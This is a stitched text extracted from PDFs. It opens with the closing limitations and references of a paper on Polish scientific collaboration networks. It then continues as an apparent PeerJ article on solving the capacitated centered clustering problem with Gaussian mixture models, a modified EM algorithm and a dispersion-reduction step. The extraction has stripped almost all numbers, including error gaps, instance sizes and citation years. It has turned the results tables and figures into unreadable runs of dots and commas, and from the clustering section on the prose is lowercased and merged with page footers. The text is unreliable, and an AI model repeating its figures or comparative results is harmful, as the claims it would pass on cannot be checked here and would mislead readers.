Nevertheless, it is representative in a loose sense – the respondents come from universities from different regions and of different sizes, from different disciplines, and at different stages of the scientific career. We believe it covers the diversity of scientific positions reasonably well. Second, the data contain several instances of resource flows between the alters. However, the reliability of these data is rather low: the majority of respondents did not have enough information, or were otherwise not confident enough, to report those resource contributions. Consequently, these data were not collected systematically.

Acknowledgments
The authors thank the (Polish) National Science Centre for support through a SONATA grant for the project Dynamics of Competition and Collaboration in Science: Individual Strategies, Collaboration Networks, and Organizational Hierarchies (http://recon.icm.edu.pl).

References
Bojanowski, M. and Czerniawska, D. Reaching for unique resources: structural holes and specialization in scientific collaboration networks. Journal of Social Structure, forthcoming. Preprint available online at: http://recon.icm.edu.pl/wp-content/uploads/exchange_networks.pdf.
Coleman, J. S. Foundations of Social Theory. Harvard University Press, Cambridge, MA.
Czerniawska, D. Sieci współpracy i wymiany w centrach i na peryferiach. Przypadek polskiej nauki [Networks of collaboration and exchange in centres and peripheries: the case of Polish science]. PhD thesis, University of Warsaw, Warsaw, Poland.
Czerniawska, D., Fenrich, W. and Bojanowski, M. Actors, relations, and networks: scholarly collaboration beyond bibliometric measures. Polish Sociological Review.
Krivitsky, P. N. and Morris, M. Inference for social network models from egocentrically sampled data, with application to understanding persistent racial disparities in HIV prevalence in the US. The Annals of Applied Statistics.
Krivitsky, P. N., Koehly, L. M. and Marcum, C. S. Exponential-family random graph models for multi-layer networks. SocArXiv, available at: https://doi.org/ . /osf.io/dqe b.
Kwiek, M. Changing European Academics: A Comparative Study of Social Stratification, Work Patterns and Research Productivity. Routledge, London.
Kwiek, M. and Szadkowski, K. Higher education systems and institutions, Poland. In Teixeira, P., Shin, J. C., Amaral, A., Bernasconi, A., Magalhaes, A., Kehm, B. M. and Nokkala, T. (eds), Encyclopedia of International Higher Education Systems and Institutions, Springer.
Laudel, G. Collaboration, creativity and rewards: why and how scientists collaborate. International Journal of Technology Management.
Lewis, J. M., Ross, S. and Holden, T. The how and why of academic collaboration: disciplinary differences and policy implications. Higher Education.
Leydesdorff, L., Wagner, C., Park, H. W. and Adams, J. International collaboration in science: the global map and the network. Available at: http://arxiv.org/abs/ .
Moody, J. The structure of a social science collaboration network: disciplinary cohesion. American Sociological Review.
OECD. OECD Science, Technology and R&D Statistics: Main Science and Technology Indicators. Available at: https://data.oecd.org.
Qin, J., Lancaster, F. W. and Allen, B. Types and levels of collaboration in interdisciplinary research in the sciences.
Journal of the American Society for Information Science.

Solution strategy based on Gaussian mixture models and dispersion reduction for the capacitated centered clustering problem
Santiago-Omar Caballero-Morales
Postgraduate Department of Logistics and Supply Chain Management, Universidad Popular Autónoma del Estado de Puebla, Puebla, Puebla, Mexico

Abstract
The capacitated centered clustering problem (CCCP), a multi-facility location model, is very important within the logistics and supply chain management fields due to its impact on industrial transportation and distribution. However, solving the CCCP is a challenging task due to its computational complexity. In this work, a strategy based on Gaussian mixture models (GMMs) and dispersion reduction is presented to obtain the most likely locations of facilities for sets of client points considering their distribution patterns. Experiments performed on large CCCP instances, considering updated best-known solutions, led to an estimate of the performance of the GMMs approach, termed dispersion reduction GMMs, with a mean error gap smaller than . %. This result is more competitive when compared to variable neighborhood search, simulated annealing, the genetic algorithm and CKMeans, and faster to achieve when compared to the best-known solutions obtained by tabu search and clustering search.

Subjects: Algorithms and Analysis of Algorithms, Data Mining and Machine Learning, Optimization Theory and Computation
Keywords: capacitated centered clustering problem, Gaussian mixture models, dispersion reduction, expectation-maximization

Introduction
Facilities are very important infrastructure within the supply chain as they support production, distribution and warehousing. Due to this, many operative processes associated with facilities are subject to optimization. Fields such as facility layout planning are crucial for smooth material handling and production flow (Mohamadghasemi & Hadi-Vencheh; Hadi-Vencheh & Mohamadghasemi; Niroomand et al.). On the other hand, where to locate facilities within specific regions is a central problem for strategic decisions of transportation and distribution (Chaves, Correa & Lorena). This is because the distance between the facilities and the customers (demand or client points) is crucial to provide efficient transportation and distribution services.
Within this context, the capacitated centered clustering problem (CCCP) is one of the best-known and most challenging multi-facility location (MFL) problems in the fields of operations research, logistics and supply chain management (Chaves & Nogueira-Lorena; Mahmoodi-Darani et al.). The CCCP is focused on determining clusters or
groups of demand or client points which can lead to minimum average distances to their centroids (where facilities are to be located). The cumulative demand of the client points assigned to a cluster cannot exceed the capacity of the facility located at its centroid (Chaves & Nogueira-Lorena; Negreiros & Palhano). The mathematical formulation of the CCCP is presented as follows (Chaves & Nogueira-Lorena; Negreiros & Palhano):

$$\min \sum_{i \in I} \sum_{k \in K} \lVert x_i - \mu_k \rVert \, y_{ik} \qquad (1)$$

subject to

$$\sum_{k \in K} y_{ik} = 1 \quad \forall i \in I \qquad (2)$$
$$\sum_{i \in I} y_{ik} = n_k \quad \forall k \in K \qquad (3)$$
$$\sum_{i \in I} x_i\, y_{ik} = n_k\, \mu_k \quad \forall k \in K \qquad (4)$$
$$\sum_{i \in I} d_i\, y_{ik} \le c_k \quad \forall k \in K \qquad (5)$$
$$\mu_k \in \mathbb{R}^{l},\; n_k \in \mathbb{N},\; y_{ik} \in \{0,1\} \quad \forall i \in I,\; k \in K \qquad (6)$$

where (a) I is the set of all demand points or clients (n = number of points); (b) K is the set of clusters (groups of clients assigned to a facility), with |K| = number of facilities; (c) x_i is the geometric position of the i-th point in the R^l space (l = 2 for a two-dimensional space, and x_i = [cx_i, cy_i], where cx_i is the x-coordinate and cy_i is the y-coordinate of x_i); (d) mu_k is the geometric position of the centroid of cluster k (i.e., the location of the k-th facility; if l = 2, mu_k = [cx_k, cy_k], where cx_k is the x-coordinate and cy_k is the y-coordinate of mu_k); (e) y_ik = 1 if point i is assigned to cluster k and y_ik = 0 otherwise; (f) n_k is the number of points in cluster k; (g) d_i is the demand of point i; and (h) c_k is the capacity of cluster k.
In this formulation, Eq. (1) defines the non-linear objective function, which consists of minimizing the total distance between each point and the centroid of the cluster to which the point is assigned. As mentioned in Chaves & Nogueira-Lorena, the geometric position of the centroid depends on the points that compose the cluster. Equations (2) and (3) are restrictions that define that each point is assigned to exactly one cluster and that provide the number of points in each cluster, respectively. Equation (4) is the restriction that locates the centroid of each cluster at its geometric center, while Eq. (5) is the restriction that defines that the total demand of the points assigned to a cluster k must not exceed its capacity. Finally, Eq. (6) defines the nature of mu_k, the decision variable y_ik, and the upper limit for the number of individuals or points per cluster (n_k). n_k is obtained from the values of the decision variables y_ik, as these determine the number of points assigned to each cluster (for example, if for cluster k the optimal solution assigns three points, so that three of the y_ik take the value 1, then n_k = 3). This is explained in more detail in the section "Standard EM algorithm".
The CCCP has been approached with different solving methods (particularly meta-heuristics) due to its combinatorial nature and NP-hard computational complexity (hence, it is difficult to solve with exact methods) (Chaves, Correa & Lorena; Chaves & Nogueira-Lorena; Herda; Negreiros & Palhano). While there are works reported in the literature that have achieved very competitive results for small, medium and large instances of the CCCP, their performance depends on the size or scale of the instances.
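To illustrate the formulation, the sketch below evaluates the objective of Eq. (1) and checks the capacity restriction of Eq. (5) for a candidate assignment. It is a minimal illustration with our own function names and synthetic values; it is not the paper's code.

```python
# A minimal sketch (not the paper's code): evaluate the CCCP objective (Eq. 1)
# and check the capacity restriction (Eq. 5) for a candidate assignment.
import numpy as np

def evaluate_cccp(points, demands, capacity, assign):
    """points: (n, 2) coordinates; demands: (n,); assign: (n,) cluster index per point."""
    total_dist = 0.0
    feasible = True
    for k in np.unique(assign):
        members = points[assign == k]
        centroid = members.mean(axis=0)                                  # Eq. (4): geometric center
        total_dist += np.linalg.norm(members - centroid, axis=1).sum()  # Eq. (1)
        if demands[assign == k].sum() > capacity:                        # Eq. (5)
            feasible = False
    return total_dist, feasible

# Tiny synthetic example (values are illustrative only).
rng = np.random.default_rng(0)
pts = rng.random((10, 2))
dem = np.ones(10)
cost, ok = evaluate_cccp(pts, dem, capacity=6, assign=rng.integers(0, 2, size=10))
print(cost, ok)
```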
In this work, the technique of Gaussian mixture models (GMMs) is proposed to estimate clusters of maximum probability in order to provide feasible solutions for large instances of the CCCP (n > , points). This is accomplished by the meta-heuristic termed dispersion reduction GMMs (DRG), which integrates the following algorithms:
• an adapted expectation-maximization (EM) algorithm to estimate the parameters of GMMs and generate clusters of points of maximum likelihood that satisfy the capacity requirements of the CCCP;
• a dispersion reduction algorithm to compress large CCCP data and achieve near-optimal results within faster computational times.
Both the application of GMMs and the validity of the EM algorithm for the CCCP have not been explored in previous works. Experiments with DRG on large instances of the CCCP, considering the benchmarks of the clustering search (CS) algorithm (de-Oliveira, Chaves & Nogueira-Lorena) and tabu search (TS) (Fernandes-Muritiba et al.), led to a mean error of less than . %. In general, the DRG algorithm performed better than variable neighborhood search (VNS), simulated annealing (SA), genetic algorithms (GA) and CKMeans (CKM). The advances of the present work can provide a better understanding of Gaussian modeling and the EM algorithm for their application in facility location problems.
The contributions of this paper are presented as follows. First, in the section "Clustering", an overview of clustering and the mathematical foundations of GMMs are presented, together with the findings regarding the specific dispersion reduction process required by CCCP data in order to make it suitable for the EM algorithm. Then, in the section "DRG meta-heuristic", the details of the DRG meta-heuristic are presented, while the results regarding its performance are discussed in the section "Results and assessment". Finally, conclusions and improvement recommendations are discussed in the section "Conclusions and future work".

Clustering
Most of the solving algorithms for the CCCP perform clustering within the search process for an initial partitioning of the set of demand points. This partitioning is then improved by exchanging certain points between the most promising partitions or clusters (Hansen & Jaumard; Negreiros & Palhano). Formally, clustering involves the grouping of data points in a way that the homogeneity of points within a group, and the heterogeneity of points between groups, are maximized (Chaves & Nogueira-Lorena; Negreiros & Palhano). For the CCCP, the technique used for clustering has an important role in the quality of the solutions, and may lead to significant differences from best-known results (i.e., errors ranging from . % (Radiah, Hasnah & Omar) up to % (Negreiros & Palhano)).

Gaussian mixture models
Gaussian mixture models (GMMs) have been widely studied for data modeling within the field of pattern classification based on Bayes decision theory (Theodoridis & Koutroumbas). For more accurate modeling of multi-dimensional patterns, a mixture of Gaussian distributions can be used. Each mixture component is defined by two main parameters: a mean vector and a covariance matrix (Forsyth; Theodoridis & Koutroumbas). Within this context, "clusters" can be characterized by each Gaussian component (mixture), which can model sub-sets of the whole set of patterns with maximum likelihood.
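For intuition, GMM-based clustering can be tried with an off-the-shelf EM implementation such as scikit-learn. The sketch below is a generic illustration of fitting a mixture and reading off soft and hard cluster memberships; it is not the paper's capacity-aware DRG algorithm, which is developed in the following sections.

```python
# Generic illustration of GMM-based clustering with off-the-shelf EM (scikit-learn);
# this is NOT the capacity-aware DRG meta-heuristic described in the paper.
import numpy as np
from sklearn.mixture import GaussianMixture

rng = np.random.default_rng(1)
# Synthetic client coordinates drawn from three blobs (illustrative only).
pts = np.vstack([rng.normal(c, 0.05, size=(50, 2))
                 for c in ([0.2, 0.2], [0.8, 0.3], [0.5, 0.8])])

gmm = GaussianMixture(n_components=3, covariance_type="full", random_state=0).fit(pts)
soft = gmm.predict_proba(pts)   # "soft" responsibilities of each component for each point
hard = gmm.predict(pts)         # hard labels obtained by taking the most likely component

print(gmm.means_)               # the component means play the role of cluster centroids
print(soft[0], hard[0])
```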
There are important differences between the clustering that can be obtained with GMMs and centroid-based clustering techniques (such as k-means or k-nearest neighbors). The following can be mentioned:
• Over-fitting (e.g., the model "overreacts" to minor fluctuations in the training data for prediction purposes) can be avoided with Gaussian distribution-based clustering.
• Clusters defined with Gaussian distributions can have different shapes and sizes. By contrast, centroid-based clustering algorithms tend to find clusters of comparable size and of (more or less) symmetrical shape (Mohammed, Badruddin & Mohammed).
• At each iteration, Gaussian distribution-based clustering performs, for a given point, a "soft assignment" to a particular cluster (there is a degree of uncertainty regarding the assignment). Centroid-based clustering performs a hard assignment (or direct assignment), where a given point is assigned to a particular cluster and there is no uncertainty.
Due to these differences, GMM-based clustering was considered as an alternative to generate feasible solutions for the CCCP. In terms of the CCCP formulation described in the section "Introduction", a cluster can be modeled by a single Gaussian probability density function (pdf). Hence, the location "patterns" of a set of clients X can be modeled by a mixture of |K| Gaussian pdfs, where each pdf models a single cluster. If the set contains n clients, then X = [x_1, x_2, …, x_n] and the mixture can be expressed as:

$$p(x) = \sum_{k=1}^{|K|} \pi_k\, p(x \mid k) = \sum_{k=1}^{|K|} \pi_k\, \mathcal{N}(x \mid \mu_k, \Sigma_k), \qquad (7)$$

where k = 1, …, |K| and |K| = p is the number of Gaussian pdfs, p(x | k) represents the probability of each Gaussian pdf describing the set of clients X (Theodoridis & Koutroumbas), and pi_k is the weight associated with each Gaussian pdf (hence, the weights sum to 1.0). Each Gaussian component can be expressed as:

$$p(x \mid k) = \mathcal{N}(x \mid \mu_k, \Sigma_k) = \frac{1}{\sqrt{(2\pi)^{l}\,\lvert \Sigma_k \rvert}}\; e^{-\frac{1}{2}(x - \mu_k)^{T} \Sigma_k^{-1} (x - \mu_k)} \quad \forall k \in K, \qquad (8)$$
in this context, it is important to mention that due to the probabilistic nature of the inference process, a single point xi is not directly assigned to a specific cluster (as it is required by the cccp) because all points have probabilities associated to all clusters (i.e., “soft- assignment”). also, this approach does not consider the capacity of each cluster and the demand associated to each client point. thus, restrictions about the quantity of points xi associated to each cluster are not integrated in this algorithm. in order to consider these requirements and restrictions a modification on the em algorithm was performed. this is described in the following sections. dispersion reduction in gmms performance for the cccp capacitated centered clustering problem data, which consists of x and y coordinates, represents a particular challenge for gmms. this is because the values of coordinates can affect the computation of the exponential element of eq. ( ). also, dispersion of data may affect convergence of the em algorithm for pk, mk and sk. thus, specific re-scaling or coding of cccp data was required to reduce the effect of dispersion and coordinates’ values on the computations of gmms. in order to reduce dispersion of the cccp data the compression algorithm presented in fig. was performed. it is important to mention that compression is only performed on the coordinates’ values, and not on the number of data points (thus, the size of the instance remains the same). as presented, the original x–y coordinates were replaced by their unique indexes. this led to elimination of empty spaces between data points. coding of the compressed data was performed within the interval ; ½ � as presented in fig. . this coding made the compressed data more suitable for fast computation of eq. ( ). caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an important issue regarding the use of gmms for the cccp is the restriction on the number of gaussian components. in this regard, extensive research has been performed to determine the most suitable number of gaussian components for different sets of data (mclachlan & rathnayake, ). however, available research does not consider the capacity aspect of clustering which is the main feature of cccp data. nevertheless, a restriction on the number of gaussian components must be considered because, as discussed in fraley & raftery ( ), the em algorithm may not be suitable for cases with very large numbers of components. due to this situation a maximum number of gaussian components was considered. this restriction was based on the doni database, which has some of the cccp instances with the largest number of client points (fernandes-muritiba et al., ) (i.e., n = , client points with p = facilities). a discussion on future extensions for the gaussian approach and the em algorithm to address larger number of components is presented in the final section. drg meta-heuristic standard em algorithm figure presents the structure of the standard em algorithm (bishop, ; theodoridis & koutroumbas, ; theodoridis & koutroumbas, ) considering the variables defined by eqs. ( ) and ( ). in this case, x represents the array of compressed and coded x − y coordinates of all points xi (the array structures presented in figs. and follow the em formulation described in theodoridis & koutroumbas ( )). 
[Figure: CCCP data compression and coding algorithm (dispersion reduction algorithm); the original x–y coordinates are replaced by the indexes i, j of their unique values, which are then coded as i/max_i and j/max_j.]

As presented in the figure describing the structure of the standard EM algorithm, the locations of the n clients are stored in the array X, which is a matrix of dimension l × n where: (a) n is the number of client points, and (b) l = 2, as each column vector of X consists of the values cx_i and cy_i that identify the compressed and coded x–y coordinates of the client point x_i, with i = 1, …, n.
The EM algorithm starts with initial values for mu_k, Sigma_k and pi_k. Values for mu_k and Sigma_k were randomly generated as follows:

$$\mu_k = \big[\, \mathrm{random}(cx_{\min}, cx_{\max}),\; \mathrm{random}(cy_{\min}, cy_{\max}) \,\big]^{T} \quad \forall k \in K, \qquad (9)$$
$$\Sigma_k = \mathrm{random}(\,\cdot\,,\,\cdot\,) \cdot I_l \quad \forall k \in K, \qquad (10)$$

where (cx_min, cx_max) and (cy_min, cy_max) are the minimum and maximum values over all compressed and coded x and y coordinates respectively, and I_l is the identity matrix of size l × l, so each covariance matrix is initialized as a random positive scalar multiple of the identity.

[Figure: structure of the standard expectation-maximization (EM) algorithm.]
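A sketch of the dispersion-reduction idea is given below: each coordinate is replaced by the index of its unique value and then scaled into (0, 1]. The function name and the toy values are ours; the paper implements this step in MATLAB.

```python
# Sketch (our own naming, not the paper's MATLAB code) of the dispersion-reduction step:
# replace each coordinate by the index of its unique value, then code into (0, 1].
import numpy as np

def compress_and_code(coords):
    """coords: (n, 2) array of original x-y client coordinates."""
    coded = np.empty_like(coords, dtype=float)
    for d in range(coords.shape[1]):
        uniq, idx = np.unique(coords[:, d], return_inverse=True)
        ranks = idx + 1                      # 1-based index of each unique value
        coded[:, d] = ranks / ranks.max()    # coding into the interval (0, 1]
    return coded

xy = np.array([[10.0, 500.0], [10.0, 900.0], [70.0, 120.0], [400.0, 120.0]])
print(compress_and_code(xy))   # empty space between coordinate values is removed
```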
however under this approach a single point xi is not directly assigned to a specific cluster (as it is required by the cccp) because all points have probabilities associated to all clusters (i.e., “soft-assignment”). also, while the standard em algorithm can determine the most likely sub-sets of client points in x to be covered by each cluster k, these sub-sets are not restricted by the capacity of the cluster and the demand of each assigned client point. hence, the standard em algorithm was modified in order to comply with the requirements and restrictions of the cccp. as previously mentioned, the score γ (zik) computed in step of the em algorithm (see fig. ) represents the likelihood or responsibility of the cluster k on the generation of the point xi (bishop, ). as presented in fig. all scores are stored into a matrix γ of dimension k × n, where each column vector cðzi Þ; …; cðzikÞ½ �t contains the assignment scores of the point xi to all clusters (thus, pk k¼ cðzikÞ¼ : i n). these scores represent the basis for defining the decision variable yik. from section “introduction” it was explained that yik = if the point xi is assigned to cluster k and yik = otherwise (each point xi can be assigned to only one cluster). based on the scores of γ (zik) it was determined that for each vector xi the cluster assignment would be defined by the cluster k with maximum γ(zik) value. if two or more clusters share the same maximum likelihood, then one of them is randomly assigned. an example of this assignment process is presented in fig. . by determining the unique assignment of each point xi to each cluster k at step of the em algorithm (see fig. ), the number of points assigned to each cluster is obtained. this leads to determine the cumulative demand of the points assigned to each cluster. this information is stored into the vector: demands ¼ d ; d ; …; dk½ �; ( ) where dk represents the cumulative demand of the points assigned to cluster k and it must satisfy dk ≤ ck. this vector is important to comply with the capacity restrictions because it was found that homogenization of the cumulative demands dk contributes to this objective. homogenization is achieved by minimizing the coefficient of variation between all cumulative demands: min cv ¼ standard deviationðdemandsÞ meanðdemandsÞ : ( ) the objective function defined by eq. ( ) is integrated within the evaluation step of the standard em algorithm (see step of fig. ). this leads to the modified em algorithm with capacity restrictions where convergence is based on two objectives: � minimization of the error (less than a threshold of e = . ) between the estimates of mk, pk and sk; � minimization of the coefficient of variation of demands. an important issue regarding the minimization of cv is that there is the possibility that min cv may not lead to comply the condition dk ≤ ck for all clusters k. this was addressed caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by the following strategy: if min cv leads to a cluster k where the condition dk ≤ ck is not complied, then the farthest assigned points are re-assigned to other clusters with closer centroids and available capacity. figure presents an example of the clustering achieved without and with the objective function defined by eq. ( ). as presented, the clusters are more accurately defined with the integration of eq. ( ). also, clusters comply with the capacity restrictions of the cccp. 
it is important to remember that the proposed drg meta-heuristic consists of the modified em algorithm which provides the cluster assignation for each point xi considering compressed and coded cccp data. thus, fig. presents the decoded and uncompressed points xi (i.e., original cxi and cyi coordinates) assigned to each cluster based on the assignments of the drg meta-heuristic with the modified em algorithm on compressed and coded data. further improvement of the assignments and the centroids at mk are achieved by a greedy algorithm that verifies that all points xi are assigned to the closest cluster. this leads to additional exchange and insertion/deletion of complying client points xi between clusters. these operations must comply with the capacity restrictions of each cluster. the assignments are updated if the insertion/deletion is valid. this leads to re-estimation of the locations of the mk centroids. results and assessment implementation of the drgmms meta-heuristic was performed with the software matlab on a laptop computer with the following hardware: intel core i - u cpu at . ghz with gb ram. for testing purposes the libraries presented in table were considered. for comparison purposes the methods and best-known results presented in chaves & nogueira-lorena ( ), chaves & nogueira-lorena ( ), fernandes-muritiba et al. ( ), de-oliveira, chaves & nogueira-lorena ( ), negreiros & palhano ( ), (a) centroid ( ) of cluster k centroid ( ) of cluster k (b) figure clustering with (a) standard em algorithm and (b) drg meta-heuristic (modified em algorithm with decoded and uncompressed cccp data). full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ palhano, negreiros & laporte ( ) and pereira & senne ( ) for the cccp were considered. these methods are the following: � best-known solutions�. the benchmarks reported in de-oliveira, chaves & nogueira- lorena ( ) have been used for the assessment of the most efficient methods for the cccp. for this work, these benchmarks were updated with the best-known results obtained with ts (fernandes-muritiba et al., ) which is considered as the current state of the art algorithm for the cccp (carvalho, mendes & azeredo-chaves, ; pereira & carvalho, ). � clustering search (cs). hybrid method which combines meta-heuristics and local search heuristics in which the search is intensified only in areas of the search space that deserve special attention (promising regions). the main idea of cs is to identify promising areas of the search space by generating solutions through a meta-heuristic and “clustering” them into groups that are further explored with local search heuristics (chaves & nogueira-lorena, ; chaves & nogueira-lorena, ; de-oliveira, chaves & nogueira-lorena, ). the results reported in de-oliveira, chaves & nogueira-lorena ( ) were considered for comparison with drg. � a two-phase heuristic using vns. the results reported in negreiros & palhano ( ) were considered for comparison with drg. these results were also reviewed by fernandes-muritiba et al. ( ) for comparison with ts. table libraries of cccp instances considered for testing and assessment. instance n k doni , doni , doni , doni , doni , doni , doni , sjc sjc sjc a sjc a ta ta ta ta ta ta ta caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � ckmeans (ckm). 
the results reported in palhano, negreiros & laporte ( ) were considered for comparison with drg. these results were also reviewed by chaves & nogueira-lorena ( ) for comparison with ga. � two-column generation (tcg). the results reported in pereira & senne ( ) were considered for comparison with drg. � simulated annealing (sa) and genetic algorithm (ga). cs performs a clustering strategy on solutions generated by a meta-heuristic, and the research in chaves & nogueira-lorena ( , ) reported the comparison of results of the cs method with the sa and ga meta-heuristics respectively. for assessment purposes, (chaves & nogueira-lorena, , ) also reported the comparison of results of sa and ga without the cs strategy (e.g., independent performance of sa and ga). these independent results were considered for comparison with drg. � tabu-search (ts). the ts algorithm reported in fernandes-muritiba et al. ( ) is currently considered state of the art by rodrigo de carvalho et al. for the cccp (carvalho, mendes & azeredo-chaves, ; pereira & carvalho, ). the results reported in fernandes-muritiba et al. ( ) were considered for comparison with drg. in order to compute the error, gap or deviation from the updated best-known solutions the error metric presented by yousefikhoshbakht & khorram ( ) was considered: errorð%Þ¼ � a�b b � � ; ( ) where a is the cost or distance of the best solution found by the algorithm for a given instance while b is the best known solution for the same instance. in this case it is important to mention that the best-known solution is not necessarily the optimal solution due to the np-hard complexity of the cccp. initially, this metric was computed for the drg, vns, sa, cs, ts and ga methods because the reference data was available for all sets of instances. drg vs. vns-sa-cs-ts-ga table presents the best results of the drg meta-heuristic for the considered instances. information regarding the runs performed by each method to report the best result is also presented when available. also, information regarding the programing language and the hardware used by the authors of the reviewed methods were also included. as reported in the literature, cs and ts are the most competitive methods to solve the cccp with a mean error gap of . % and . % respectively (and thus, were considered to update the benchmark solutions). then, the proposed drg meta-heuristic stands as the next most competitive method with a mean error gap of . %. the vns, sa and ga methods show a more significant mean error gap with . %, . % and . % respectively. also, vns, sa and ga show a higher variability in performance which is characterized by an increased standard deviation when compared with their mean error gap. the drg shows a balanced mean and standard deviation, thus its performance is more robust and consistent through all different cccp instances. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ drg vs. ckm-tcg tables and present the results of the drg meta-heuristic for the instances where reference data of the ckm and tcg methods were available. as presented in table , the drg meta-heuristic is more competitive than the ckm method. also, as previously observed, the drg is more consistent. when compared to the tcg method, this is more competitive than the drg approach even though the error gaps are minimal (less than . %). error and speed vs. 
size of the instance figure presents the graphical review of the error gaps of all methods based on the size of the test instance. ts and cs are located on the x-axis as they are the benchmark methods. it can be observed that, as the size of the instance increases, the error gap of sa, ga and vns significantly increases. tcg presents very small error gaps with small instances (less than , points) and ckm reports error gaps comparable to sa for small-medium size instances (less than , points). in contrast, drg performs consistently through all instances, decreasing its error gap as the instance grows from medium to large size (up to , points). table performance of drg, vns, sa, cs, ts and ga on cccp instances when compared to updated best-known solutions*: (a) matlab, intel core i at . ghz and gb ram, (b) amd athlon at . ghz and mb ram, (c) c++, pentium at . ghz, (d) c++, pentium at . ghz, (e) c++, intel core quad q cpu at . ghz and gb ram, (f) c++, pentium at . ghz. instance best known* n k drg (a) ( runs) error (%) vns (b) error (%) sa (c) ( runs) error (%) cs (d) ( runs) error (%) ts (e) ( runs) error (%) ga (f) ( runs) error (%) ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . ta , . , . . , . . , . . , . . , . . , . . sjc , . , . . , . . , . . , . . , . . , . . sjc , . , . . , . . , . . , . . , . . , . . sjc a , . , . . , . . , . . , . . , . . , . . sjc a , . , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . doni , . , , . . , . . , . . , . . , . . , . . mean= . mean= . mean= . mean= . mean= . mean= . stddev= . stddev= . stddev= . stddev= . stddev= . stddev= . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ regarding speed, fig. presents the computational (running) times reported by the reviewed methods. while ts and cs are the benchmark methods, these take over , s to reach the best-known solution for the largest instance. note that for these methods, their computational times exponentially increase for instances larger than , points. in contrast, sa is very consistent with a computational time of approximately , s through all instances. ga significantly increases for instances larger than , points (up to , seconds for the largest instance). however, these methods have the largest error gaps as reviewed in fig. . the speed pattern of drg is very similar to that of ga, however, as reviewed in fig. , its error gap is the closest to the benchmark methods for instances larger than , points. table performance of drg and ckm on cccp instances when compared to best-known solutions*. instance drg error (%) ckm error (%) sjc , . . , . . sjc , . . , . . sjc a , . . , . . sjc a , . . , . . doni , . . , . . doni , . . , . . doni , . . , . . doni , . . , . . doni , . . , . . mean= . mean= . stddev= . stddev= . table performance of drg and tcg on cccp instances when compared to best-known solutions*: (a) matlab, intel core i at . ghz and gb ram, (b) c++, intel core duo at ghz with gb ram. instance drg (a) error (%) tcg (b) error (%) ta , . . , . . 
ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . sjc , . . , . . sjc , . . , . . sjc a , . . , . . sjc a , . . , . . mean= . mean= . stddev= . stddev= . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . . . . . . . . . . . ta ta . . . . . ta . . . . . . . . . . . doni doni doni doni doni doni doni doni doni ta ta ta ta ta ta ta . . . . . . . . . . . e rr or g ap (% ) n ckm vns sa ga drg tcg sa ga drg ckm vns tcg ts/cs (best-known) figure comparison of error gap vs. size of the instance. full-size doi: . /peerj-cs. /fig- . . ta . . . . instancebest known tcg % drg % . . . ta . . . . sjc . . . . . . . . ta . . . . sjc . . . . . . . ta . . . . sjc a . . . . . ta . . sjc a . . . . . ta . ta . . . . . ta . . ta . . . . . ta ta . . . . . ta ta . . . . . ta ta . . . . . ta . ta . . . . . sjc . ta . . . . . sjc . . . sjc a . . . sjc a . . . % % % normalized errors max= . instances n vns sa ga drg ta . . . . ta . . . . ta . . . . ta . . . . ta . . . . ta . . . . ta . . . . sjc . . . . sjc . . . . sjc a . . . . sjc a . . . . doni . . . . doni . . . . doni . . . . doni . . . . doni . . . . doni . . . . doni . . . . e xe cu tio n t im e (s ec on ds ) n sa ga drg tcg cs ts sa ga drg cs (best-known) ts tcg figure comparison of speed vs. size of the instance. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is important to mention that this comparison may not be fair due to the differences in the programming language and the hardware used for implementation and testing of all the methods. in order to compare running speed all methods should be tested with the same hardware and be implemented with the same programming language by the same software developer (the developer’s expertise may also affect the speed performance of the software). due to the difficulty of achieving this task, in practice the comparison is commonly performed on the best results obtained by other methods as performed in chaves & nogueira-lorena ( ) and fernandes-muritiba et al. ( ). running time is measured in order to determine if the proposed method can provide a solution within reasonable time considering standard resources of hardware and software. due to this situation, the drg can provide very suitable results (< . % error gap) within very reasonable time. conclusions and future work both, the application of gaussian probability functions and the em algorithm have not been explored in the literature as solving techniques for facility location problems (e.g., cccp). an important aspect for the application of gmms is the reduction of dispersion to accomplish more efficient clustering and convergence of the em algorithm. hence, the proposed drg meta-heuristic provides important insights about the suitability of these techniques for the cccp and the challenges to improve its performance. regarding performance, ts and cs are the most competitive solving methods for the cccp and thus, were considered as benchmark methods with mean average error of . % and . % respectively. the proposed drg meta-heuristic performed as the closest best method with a mean error gap smaller than . % and there is evidence than it can provide these results faster when compared to ts and cs for large instances (> , points). 
